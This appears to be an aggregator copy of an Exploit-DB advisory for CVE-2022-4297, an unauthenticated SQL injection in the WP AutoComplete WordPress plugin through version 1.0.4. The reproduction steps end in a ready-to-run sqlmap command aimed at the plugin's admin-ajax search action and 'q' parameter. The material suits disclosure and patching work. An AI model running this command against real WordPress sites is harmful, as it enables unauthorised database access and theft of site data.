5

[webapps] WP AutoComplete 1.0.4 - Unauthenticated SQLi

 1 year ago
source link: https://www.exploit-db.com/exploits/51560
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

WP AutoComplete 1.0.4 - Unauthenticated SQLi

EDB-ID:

51560

EDB Verified:

Exploit:

  /  

Platform:

PHP

Date:

2023-07-03

Vulnerable App:

# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi
# Date: 30/06/2023
# Exploit Author: Matin nouriyan (matitanium)
# Version: <= 1.0.4
# CVE: CVE-2022-4297
Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/
# Tested on: Kali linux

---------------------------------------


The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise 
and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users,
leading to an unauthenticated SQL injection

--------------------------------------

How to Reproduce this Vulnerability:

1. Install WP AutoComplete <= 1.0.4 
2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests
3. Find requests belong to WP AutoComplete like step 5
4. Start sqlmap and exploit 
5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK